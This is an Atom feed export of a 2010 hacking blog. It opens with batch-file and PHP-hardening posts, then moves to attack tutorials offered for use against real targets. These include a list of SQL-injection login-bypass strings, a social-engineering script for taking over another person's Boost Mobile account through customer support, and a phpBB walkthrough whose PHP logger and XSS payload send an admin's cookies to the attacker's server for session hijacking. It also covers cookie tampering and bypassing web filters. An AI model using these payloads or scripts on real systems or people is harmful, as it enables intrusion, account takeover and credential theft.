/&gt;:C&lt;br /&gt;cls&lt;br /&gt;echo Thanks for using this easy user creation....blah, blah, blah..&lt;br /&gt;echo.&lt;br /&gt;pause ::&lt;br /&gt;exit&lt;br /&gt;&lt;br /&gt;Now you could also add in things such as, "please confirm the password" or whatever, but im too tired :P In case anyone did want to try and do that though its :&lt;br /&gt;&lt;br /&gt;set /p h="please confirm password: "&lt;br /&gt;if %h%==%p% goto "whereever you want it to go to"&lt;br /&gt;&lt;br /&gt;FINAL WORDS!&lt;br /&gt;&lt;br /&gt;Anyway, here are my final words on cmd. They are a great way to start programming in my view, its a lot easier than most other proper things like C, delphi ect...but its a lot more limited. Its really easy to learn actually, and when you can, you get the great feeling that you can do most things with them.&lt;br /&gt;&lt;br /&gt;Some links that might help you (they did help me) are:&lt;br /&gt;&lt;br /&gt;*http://www.robvanderwoude.com/batchfiles.html&lt;br /&gt;*http://www.ericphelps.com/batch/tricks/index.htm&lt;br /&gt;*http://www.ericphelps.com/batch/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-3940207125789387903?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/3940207125789387903/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/batch-files.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/3940207125789387903'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/3940207125789387903'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/batch-files.html' title='Batch Files'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-7048210926671391744</id><published>2010-02-11T12:03:00.001-08:00</published><updated>2010-02-11T12:03:46.564-08:00</updated><title type='text'>Securing your PHP code</title><content type='html'>its a natural thing to secure your website, or so you would think. PHP comes with tons of security features that many web developers dont consider when coding a website. Security is in place to protect your members sensitive data and to prevent defacements or at worst to prevent server comprimise. I will cover a couple security measures that you can use when writing "proper" PHP code. Nobody wants to wake up to a website thats been hacked overnight or while your on the shitter.&lt;br /&gt;&lt;br /&gt;Some of the most basic and overlooked things are, cleaning your variables and all user input. Many variables themselves can be overwritten with user specified data from a malicious user. Let's say you have an admin panel on your website thats not the most secure thing y'know, but it works well. Someone finds a hole or bruteforces their way in without any visiable knowledge. That admin panel maybe be able to delete files. Whats to say the attacker doesnt just delete files but goes ahead and deletes passwd entires or other sensitive server files that would stop them from advancing.&lt;br /&gt;&lt;br /&gt;all inputs from the "outside" coming in should be checked for malicious content!!! I will not cover security with your database. I have written many articles on SQL injection, if you dont know what it is please research it. Database security is very inmportant, I will not cover it here.&lt;br /&gt;&lt;br /&gt;Magic Quotes&lt;br /&gt;Magic quotes are a "godsend" when it comes to dealing with user input. When this option is tunred on (located in your php.ini) it will escapes all single and double quotes, backslashes, and NULL bytes from a users input with a backslash. The problem with turning magic quotes on is that maybe you want your users to use single or double quotes, or when uploading files. If you turn this off you can at "runtime" parse the strings from the user entered data.&lt;br /&gt;&lt;br /&gt;If your new to PHP i would suggest turning this on until you learn how to properly parse and display data that users enter. I personally use a "clean" function that i've written. I will give you a basic "on-the-fly" one just for this tutorial so you can start building your own cleaning function.&lt;br /&gt;&lt;br /&gt;&lt;?php&lt;br /&gt;function clean($string) {&lt;br /&gt;$string = stripslashes($string);&lt;br /&gt;$string = htmlentities($string);&lt;br /&gt;$string = strip_tags($string);&lt;br /&gt;return $string;&lt;br /&gt;}&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;you would use this function like below, if your user was submitting a form that required a username.&lt;br /&gt;&lt;br /&gt;&lt;?php&lt;br /&gt;$username = $_POST;&lt;br /&gt;echo clean($mystring);&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;There are 3 directives for the magic quotes, refer to the php.net website or the php manual. Basically the 3 directives are magic_quotes_gpc, these deal with the request data (get, post, cookies). magic_quotes_runtime deal with flatfiles and databases, external files. the third is magic_quotes_sybase, this will override the magic_quotes_gpc if its enabled. This one will escape single quotes with another single quote.&lt;br /&gt;---------------&lt;br /&gt;&lt;br /&gt;Security Through Obscurity&lt;br /&gt;Recently you may not have noticed, I sure have on some websites where an ASP or PERL extension can be found in place of the normal PHP when you know for true, 100% fact that the website is running a php/sql based front and backend. This is "obscurity through security" when instead of telling the attackers your using php scripts you mislead them into thinking your running perl or pythoin or whatever type of script you want.&lt;br /&gt;&lt;br /&gt;For example, your run a php script with the .php extension, like normal. Rather than showing the world your "hello.php" script you can actually use Apache to "hide" or "obscure" the real file's extension. So instead of normally using "hello.php" you could disguise the file to viewers as perl, "hello.pl" even though its a PHP script. like so...&lt;br /&gt;&lt;br /&gt;AddType application/x-httpd-php .asp .py .pl&lt;br /&gt;&lt;br /&gt;my favorite is making up my own file extensions, like .sun or .fuck&lt;br /&gt;&lt;br /&gt;AddType application/x-httpd-php .sun .fuck .1e3t&lt;br /&gt;&lt;br /&gt;Im sure if an attacker is just looking for something to fuck with when he comes across a .sun file that runs like a php file, theyll will be heartbroken and confused. Give it a try. The above codes are for the Apache configuration file. If your on a shared hosting you may not have access to the Apache configuration files, Maybe you could make some suggestions to your host.&lt;br /&gt;---------------&lt;br /&gt;&lt;br /&gt;[u]Register Globals&lt;br /&gt;This is a big change in PHP when 4.2 came out. This is an on/off option in the INI file for php (php.ini). PHP doesnt force you to initial variables like other languages, for this, people think its a very insecure language. When register globals is on it will allow a request to set a variable. The best kind of example is a member login form. Let's say register globals is on..&lt;br /&gt;&lt;br /&gt;&lt;?php&lt;br /&gt;if($authed = true) {&lt;br /&gt;echo "my sensitive information";&lt;br /&gt;}&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;Any user can get to the "sensitive information" by sending a GET request. You could do this via telnet or by browser, like so sin.php?authed=true, which reveals the sensitive information. Turning them off will defeat this problem. Now when we try to visit the site sin.php?authed=true, It will be blank. Users cannot initialize variables from an external source. Another way to protect your variables from external sources would be to check if they are submitted via a GET or POST request.&lt;br /&gt;&lt;br /&gt;&lt;?php&lt;br /&gt;$authed = true;&lt;br /&gt;&lt;br /&gt;if(isset($_POST[authed]) || $_GET[authed]) {&lt;br /&gt;echo "variable violation";&lt;br /&gt;} else {&lt;br /&gt;if($authed == true) {&lt;br /&gt;echo "my sensitive information";&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;By monitoring the GET and POST requests we can check to see if someone is trying to inject something into our variables without the script doing it. Usually followed by not only a message telling them they have wrong the variable, but usually a mail() will follow to notify the admins on the website. I love this one.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-7048210926671391744?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/7048210926671391744/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/securing-your-php-code.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/7048210926671391744'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/7048210926671391744'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/securing-your-php-code.html' title='Securing your PHP code'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-6246428183293246095</id><published>2010-02-11T11:36:00.000-08:00</published><updated>2010-02-11T11:37:06.140-08:00</updated><title type='text'>Bypassing login scripts with SQL Injection</title><content type='html'>For those of you who dont already know SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and commands on the backend database server through the Web application.&lt;br /&gt;&lt;br /&gt;A database is a table full of private and public site information such as usernames, products, etc. They are fundamental components of Web applications. Databases enable Web applications to store data, preferences and content elements. Using SQL web applications interact with databases to dynamically build customized data views for each user.&lt;br /&gt;&lt;br /&gt;Data types:&lt;br /&gt;mysql.user&lt;br /&gt;mysql.host&lt;br /&gt;mysql.db&lt;br /&gt;&lt;br /&gt;SQL commands:&lt;br /&gt;ABORT -- abort the current transaction&lt;br /&gt;ALTER DATABASE -- change a database&lt;br /&gt;ALTER GROUP -- add users to a group or remove users from a group&lt;br /&gt;ALTER TABLE -- change the definition of a table&lt;br /&gt;ALTER TRIGGER -- change the definition of a trigger&lt;br /&gt;ALTER USER -- change a database user account&lt;br /&gt;ANALYZE -- collect statistics about a database&lt;br /&gt;BEGIN -- start a transaction block&lt;br /&gt;CHECKPOINT -- force a transaction log checkpoint&lt;br /&gt;CLOSE -- close a cursor&lt;br /&gt;CLUSTER -- cluster a table according to an index&lt;br /&gt;COMMENT -- define or change the comment of an object&lt;br /&gt;COMMIT -- commit the current transaction&lt;br /&gt;COPY -- copy data between files and tables&lt;br /&gt;CREATE AGGREGATE -- define a new aggregate function&lt;br /&gt;CREATE CAST -- define a user-defined cast&lt;br /&gt;CREATE CONSTRAINT TRIGGER -- define a new constraint trigger&lt;br /&gt;CREATE CONVERSION -- define a user-defined conversion&lt;br /&gt;CREATE DATABASE -- create a new database&lt;br /&gt;CREATE DOMAIN -- define a new domain&lt;br /&gt;CREATE FUNCTION -- define a new function&lt;br /&gt;CREATE GROUP -- define a new user group&lt;br /&gt;CREATE INDEX -- define a new index&lt;br /&gt;CREATE LANGUAGE -- define a new procedural language&lt;br /&gt;CREATE OPERATOR -- define a new operator&lt;br /&gt;CREATE OPERATOR CLASS -- define a new operator class for indexes&lt;br /&gt;CREATE RULE -- define a new rewrite rule&lt;br /&gt;CREATE SCHEMA -- define a new schema&lt;br /&gt;CREATE SEQUENCE -- define a new sequence generator&lt;br /&gt;CREATE TABLE -- define a new table&lt;br /&gt;CREATE TABLE AS -- create a new table from the results of a query&lt;br /&gt;CREATE TRIGGER -- define a new trigger&lt;br /&gt;CREATE TYPE -- define a new data type&lt;br /&gt;CREATE USER -- define a new database user account&lt;br /&gt;CREATE VIEW -- define a new view&lt;br /&gt;DEALLOCATE -- remove a prepared query&lt;br /&gt;DECLARE -- define a cursor&lt;br /&gt;DELETE -- delete rows of a table&lt;br /&gt;DROP AGGREGATE -- remove a user-defined aggregate function&lt;br /&gt;DROP CAST -- remove a user-defined cast&lt;br /&gt;DROP CONVERSION -- remove a user-defined conversion&lt;br /&gt;DROP DATABASE -- remove a database&lt;br /&gt;DROP DOMAIN -- remove a user-defined domain&lt;br /&gt;DROP FUNCTION -- remove a user-defined function&lt;br /&gt;DROP GROUP -- remove a user group&lt;br /&gt;DROP INDEX -- remove an index&lt;br /&gt;DROP LANGUAGE -- remove a user-defined procedural language&lt;br /&gt;DROP OPERATOR -- remove a user-defined operator&lt;br /&gt;DROP OPERATOR CLASS -- remove a user-defined operator class&lt;br /&gt;DROP RULE -- remove a rewrite rule&lt;br /&gt;DROP SCHEMA -- remove a schema&lt;br /&gt;DROP SEQUENCE -- remove a sequence&lt;br /&gt;DROP TABLE -- remove a table&lt;br /&gt;DROP TRIGGER -- remove a trigger&lt;br /&gt;DROP TYPE -- remove a user-defined data type&lt;br /&gt;DROP USER -- remove a database user account&lt;br /&gt;DROP VIEW -- remove a view&lt;br /&gt;END -- commit the current transaction&lt;br /&gt;EXECUTE -- execute a prepared query&lt;br /&gt;EXPLAIN -- show the execution plan of a statement&lt;br /&gt;FETCH -- retrieve rows from a table using a cursor&lt;br /&gt;GRANT -- define access privileges&lt;br /&gt;INSERT -- create new rows in a table&lt;br /&gt;LISTEN -- listen for a notification&lt;br /&gt;LOAD -- load or reload a shared library file&lt;br /&gt;LOCK -- explicitly lock a table&lt;br /&gt;MOVE -- position a cursor on a specified row of a table&lt;br /&gt;NOTIFY -- generate a notification&lt;br /&gt;PREPARE -- create a prepared query&lt;br /&gt;REINDEX -- rebuild corrupted indexes&lt;br /&gt;RESET -- restore the value of a run-time parameter to a default value&lt;br /&gt;REVOKE -- remove access privileges&lt;br /&gt;ROLLBACK -- abort the current transaction&lt;br /&gt;SELECT -- retrieve rows from a table or view&lt;br /&gt;SELECT INTO -- create a new table from the results of a query&lt;br /&gt;SET -- change a run-time parameter&lt;br /&gt;SET CONSTRAINTS -- set the constraint mode of the current transaction&lt;br /&gt;SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session&lt;br /&gt;SET TRANSACTION -- set the characteristics of the current transaction&lt;br /&gt;SHOW -- show the value of a run-time parameter&lt;br /&gt;START TRANSACTION -- start a transaction block&lt;br /&gt;TRUNCATE -- empty a table&lt;br /&gt;UNLISTEN -- stop listening for a notification&lt;br /&gt;UPDATE -- update rows of a table&lt;br /&gt;VACUUM -- garbage-collect and optionally analyze a database&lt;br /&gt;&lt;br /&gt;Bypassing login scripts:&lt;br /&gt;SQL injection strings and the DB doesnt matter.&lt;br /&gt;&lt;br /&gt;') OR ('a' = 'a&lt;br /&gt;') OR ('1'-'1&lt;br /&gt;'or''='&lt;br /&gt;' OR '1=1&lt;br /&gt;admin'--&lt;br /&gt;' or 0=0 --&lt;br /&gt;" or 0=0 --&lt;br /&gt;or 0=0 --&lt;br /&gt;' or 0=0 *&lt;br /&gt;" or 0=0 *&lt;br /&gt;or 0=0 *&lt;br /&gt;' or 'x'='x&lt;br /&gt;" or "x"="x&lt;br /&gt;') or ('x'='x&lt;br /&gt;' or 1=1--&lt;br /&gt;" or 1=1--&lt;br /&gt;or 1=1--&lt;br /&gt;' or a=a--&lt;br /&gt;" or "a"="a&lt;br /&gt;') or ('a'='a&lt;br /&gt;") or ("a"="a&lt;br /&gt;hi" or "a"="a&lt;br /&gt;hi" or 1=1 --&lt;br /&gt;hi' or 1=1 --&lt;br /&gt;hi' or 'a'='a&lt;br /&gt;hi') or ('a'='a&lt;br /&gt;hi") or ("a"="a&lt;br /&gt;' or 1=1--&lt;br /&gt;or a=a--&lt;br /&gt;' or 1=1--&lt;br /&gt;1' having '1'='1'--&lt;br /&gt;' or 'x'='x--&lt;br /&gt;foo'+OR+'1'='1&lt;br /&gt;&lt;br /&gt;Note: having 1=1--&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;&lt;br /&gt;Login: hi'or 1=1--&lt;br /&gt;Password: hi'or 1=1--&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-6246428183293246095?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/6246428183293246095/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/bypassing-login-scripts-with-sql.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/6246428183293246095'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/6246428183293246095'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/bypassing-login-scripts-with-sql.html' title='Bypassing login scripts with SQL Injection'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-3089434605981581567</id><published>2010-02-11T11:32:00.000-08:00</published><updated>2010-02-11T11:35:20.014-08:00</updated><title type='text'>How to hack boost mobile</title><content type='html'>you need a boost mobile too do this!&lt;br /&gt;&lt;br /&gt;First of all call 611 and press 3 then wait till it says enter your phone number, enter the persons number your trying to get, it will say you have xx days remaning on your account, Boost mobile gives you 90 days so take 90 from whatever they have(example 90-80days left, so they bought a card 10 days ago)So you take the days and look on a calander say its 10 days ago and today is dec 11th, so they bought a boost card on dec 1st, and its most likely a $20 card so you can Guess it theres only $20,$30,$50 cards. Ok, Keep this information written down.&lt;br /&gt;&lt;br /&gt;Ok next you need 3 phones by you and you must know all the numbers including area codes, they don't need to be cell phones, using all the phones call the person your trying to get there access code, via *67(private) don't worry it won't show up private to boost, but it will too the person your trying to do it too. Next after you call them with them numbers, have them numbers written down and ready, call 611 agian and hit 4, then 6, when you call say you forgot your boost passcode, they will ask you when you last rebooted and how much(the $ is a guess but you can usally guess from how much there balance was and how many days they rebooted but its mostly $20), then they will ask you to tell you the last 3 numbers they have been called or received, thats where the 3 numbers you just called in works, after you tell them that they will give you the access code, and BOOM you have total control! enjoy!&lt;br /&gt;&lt;br /&gt;REMEMBER WHEN YOU DO THE 3 CALLS YOU MUST BE CALLING BOOST ASAP BECAUSE IF SOMEONE ELSE CALLS IN YOU HAVE TO DO IT ALL OVER AGIAN.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-3089434605981581567?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/3089434605981581567/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/how-to-hack-boost-mobile.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/3089434605981581567'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/3089434605981581567'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/how-to-hack-boost-mobile.html' title='How to hack boost mobile'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-5875371918133028093</id><published>2010-02-11T11:29:00.000-08:00</published><updated>2010-02-11T11:30:13.106-08:00</updated><title type='text'>Hacking phpBB 2.0.19 or lower by stealing cookies</title><content type='html'>Tools needed:&lt;br /&gt;Firefox (http://www.getfirefox.com)&lt;br /&gt;Live HTTP Headers (http://livehttpheaders.mozdev.org/)&lt;br /&gt;A Free Server with PHP (http://www.t35.com)&lt;br /&gt;&lt;br /&gt;1 - Make a file with notepad&lt;br /&gt;Insert this code into it:&lt;br /&gt;&lt;?php&lt;br /&gt; $cookie = $_GET['c'];&lt;br /&gt; $ip = getenv ('REMOTE_ADDR');&lt;br /&gt; $date=date("j F, Y, g:i a");&lt;br /&gt; $referer=getenv ('HTTP_REFERER');&lt;br /&gt; $fp = fopen('pwnt.txt', 'a');	//chmod 777 lol.txt&lt;br /&gt; fwrite($fp,&lt;br /&gt;	'Cookie: '.$cookie.'&lt;br /&gt;	IP: ' .$ip. '&lt;br /&gt;	Date and Time: ' .$date. '&lt;br /&gt;	Referer: '.$referer.' ');&lt;br /&gt; fclose($fp);&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;Save it as lol.php and upload it to your free server at t35.com.&lt;br /&gt;&lt;br /&gt;2 - Now find a forum that you want to hack (if you see that html is off by default like in this picture forget it)&lt;br /&gt;http://img167.imageshack.us/img167/2742/ohnoes9sp.th.jpg (http://img167.imageshack.us/my.php?image=ohnoes9sp.jpg)&lt;br /&gt;&lt;br /&gt;3 - This is the code you have to pm the admin&lt;br /&gt;&lt;pre a="'"&gt;' onmouseover='document.location="http://yourdomain.t35.com/lol.php?c="+document.cookie' b='&lt;br /&gt;http://img485.imageshack.us/img485/4752/11403011905622mi5hj.jpg&lt;br /&gt;&lt;br /&gt;Change yourdomain to your t35.com site. Change the picture to whatever you want or just leave it. Change lol.php to whatever you named the file you made in step 1.&lt;br /&gt;&lt;br /&gt;When the admin puts his mouse over this code it will redirect him to your php file and it will show him a blank screen, you can modify that so it doesnt look so suspicious.&lt;br /&gt;&lt;br /&gt;4 - Now find the admin or whoever you want to hack, pm him the code from step 3. Now you will have to wait about a day for him to realize he has a PM.&lt;br /&gt;&lt;br /&gt;5 - Once he clicks the message it will make a file in your server called ****.txt, open it.&lt;br /&gt;You will see some code that looks like this:&lt;br /&gt;Xforums_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:3:\"320\";}; admin=cXVpeGplc3RlcjozOTIxYzc1YjI5OTI2OGJkODdmNDhl YzhjMjg5YzNmMDplbmdsaXNo; user=MzIwOnViZXJtYWdlOjljZGZiNDM5Yzc4NzZlNzAzZTMwN zg2NGM5MTY3YTE1OjEwOjowOjA6MDowOjo0MDk2; lang=english; eqdkp_data=a:2:{s:13:\"auto_login_id\";s:32:\"3921c75b299268bd87f48ec8c289c3f0\";s:7:\"user_id\";s:1:\"1\";}; Xforums_sid=8e01ff74cfe643a527bdeafc9293a991&lt;br /&gt;&lt;br /&gt;A - The easiest way is to copy the password hash which in this case is&lt;br /&gt;3921c75b299268bd87f48ec8c289c3f0&lt;br /&gt;Copy that hash&lt;br /&gt;go to md5.rednoize.com or any other cracker and paste it there, if nothing shows up, you will have to use http headers (in example B) to login as the admin.&lt;br /&gt;&lt;br /&gt;B - Go to the forum you hacked, click on tools -&gt; live http headers (assuming you have firefox and http headers installed)&lt;br /&gt;&lt;br /&gt;Now refresh the page, at the top of the http headers screen you will see something like this:&lt;br /&gt;http://img190.imageshack.us/img190/310/httpheaders6bg.th.jpg (http://img190.imageshack.us/my.php?image=httpheaders6bg.jpg)&lt;br /&gt;&lt;br /&gt;Click on Replay&lt;br /&gt;&lt;br /&gt;Delete all the code that comes after&lt;br /&gt;cookie:&lt;br /&gt;&lt;br /&gt;Replace it with the code from step 5 that you recieved from your server's log.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-5875371918133028093?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/5875371918133028093/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/hacking-phpbb-2019-or-lower-by-stealing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/5875371918133028093'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/5875371918133028093'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/hacking-phpbb-2019-or-lower-by-stealing.html' title='Hacking phpBB 2.0.19 or lower by stealing cookies'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-3259036199203546805</id><published>2010-02-11T11:27:00.000-08:00</published><updated>2010-02-11T11:28:17.779-08:00</updated><title type='text'>JavaScript Injection</title><content type='html'>As with any self respecting beginners tutorial i'm gonna show you how to make your browser say 'hello world'. To do this you first need to empty the url bar of the browser completely, then type in the following code:&lt;br /&gt;javascript:alert('Hello World');&lt;br /&gt;This uses the function alert which as you should now know brings up an alert box.&lt;br /&gt;&lt;br /&gt;Now onto something a bit more useful. Most websites you visit now will save a cookie on your computer, to see this you can use the following js:&lt;br /&gt;javascript:alert(document.cookie);&lt;br /&gt;You can also use the void function to add or change a variable. For my example i'm going to add a field called 'admin' and have its value set to 'true'. Here's how to do it:&lt;br /&gt;javascript:void(document.cookie="Admin=True");&lt;br /&gt;To see what effect this had use the following js again:&lt;br /&gt;javascript:alert(document.cookie);&lt;br /&gt;Alternatively you can concatenate the two commands (or for that matter any number of commands), in the following way:&lt;br /&gt;javascript:void(document.cookie="Admin=True");javascript:alert(document.cookie);&lt;br /&gt;Don't forget the ';' at the end of each command!&lt;br /&gt;&lt;br /&gt;Now to fiddle with the http://elitehackers.info/forums forms/ &gt;:) . If you right click and look at the source code for the page the first form you will see should be this:&lt;br /&gt;&lt;br /&gt;&lt;form action="search.php" method="post"&gt;&lt;br /&gt;    &lt;input type="hidden" name="do" value="process"&gt;&lt;br /&gt;    &lt;input type="hidden" name="showposts" value="0"&gt;&lt;br /&gt;    &lt;input type="hidden" name="quicksearch" value="1"&gt;&lt;br /&gt;    &lt;input type="hidden" name="s" value=""&gt;&lt;br /&gt;&lt;input type="text" class="bginput" name="query" size="20"&gt; &lt;input type="submit" class="button" value="Go"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;All the forms are stored in any array called 'forms' so the first form will be 'forms[0]' and the second 'forms[1]' etc. We are going to be changing the value of the 'showposts' field.&lt;br /&gt;First lets bring it up in an alert box so we can see what it's currently set as:&lt;br /&gt;javascript:alert(document.forms[0].showposts.value);&lt;br /&gt;This should popup an alert box shiwng the current value of 'showposts' which is '0'. To change this to '1' we will use the void function again:&lt;br /&gt;javascript:void(document.forms[0].showposts.value="1");javascript:alert(document.forms[0].showposts.value);&lt;br /&gt;Obviously this isn't very useful but used in other situations can come in handy. That's all folks!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-3259036199203546805?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/3259036199203546805/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/javascript-injection.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/3259036199203546805'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/3259036199203546805'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/javascript-injection.html' title='JavaScript Injection'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-5331589243593484895</id><published>2010-02-11T11:26:00.001-08:00</published><updated>2010-02-11T11:26:56.091-08:00</updated><title type='text'>Bypassing Web Filtering Systems</title><content type='html'>I see a lot of people asking how to bypass filtering systems so I decided to write a quick "tutorial" if you want to call it that,&lt;br /&gt;on bypassing most filtering systems. This tutorial will show you where to obtain public proxies, private proxies, where/what programs&lt;br /&gt;to download, and how to use those programs. Also a couple ways that do not require using a proxy server or a program.&lt;br /&gt;&lt;br /&gt;Proxy Severs:&lt;br /&gt;A proxy server is a server that will accept traffic in, route it to your destination, and then route it back to you. A couple places&lt;br /&gt;you can find public proxy servers are:&lt;br /&gt;&lt;br /&gt;http://www.publicproxyservers.com/&lt;br /&gt;http://www.samair.ru/proxy/&lt;br /&gt;http://www.multiproxy.org/&lt;br /&gt;&lt;br /&gt;These are just a couple examples I grabbed searching google. I've used samair.ru and multiproxy.org before and both are fairly decent,&lt;br /&gt;there are a couple times that proxies from these sites do not work, but most of them do, so no worries.&lt;br /&gt;&lt;br /&gt;Applying a proxy is very easy, I'll show you how to do it using Internet Explorer and Firefox:&lt;br /&gt;&lt;br /&gt;Internet Explorer:&lt;br /&gt;1)Click Tools&lt;br /&gt;2)Click Internet Options&lt;br /&gt;3)Click Connections tab&lt;br /&gt;4)Click LAN Settings&lt;br /&gt;5)Check the use a proxy server box&lt;br /&gt;6)Put in the IP address of the proxy in the address box&lt;br /&gt;7)Put the port number the proxy is using in the port box&lt;br /&gt;&lt;br /&gt;Firefox:&lt;br /&gt;1)Click Tools&lt;br /&gt;2)Click Options&lt;br /&gt;3)Click General tab&lt;br /&gt;4)Click Connection Settings&lt;br /&gt;5)Select Manual Proxy Configuration&lt;br /&gt;6)Put the IP address of the proxy in the HTTP Proxy box&lt;br /&gt;7)Put the port number of the proxy in the port box&lt;br /&gt;&lt;br /&gt;Now then, that wasn't too hard. This is how you can find and use a public proxy.&lt;br /&gt;&lt;br /&gt;Finding a private proxy server is a little different, but still not very hard. Some of the most common ports that proxy servers&lt;br /&gt;run on are 8080, 80, 6588, and 3128. There are different programs out there that will find proxy servers for you, or even using&lt;br /&gt;nmap to scan ranges looking for these ports and then testing them manually for speed. A little advice though, if you want to find&lt;br /&gt;fast private (somewhat private) proxy servers, check the first 20 IP blocks of ISPs and major corporations. Sometimes using a mass&lt;br /&gt;resolving tool will allow you to find servers that are named something along the lines of: proxy.blah.com.&lt;br 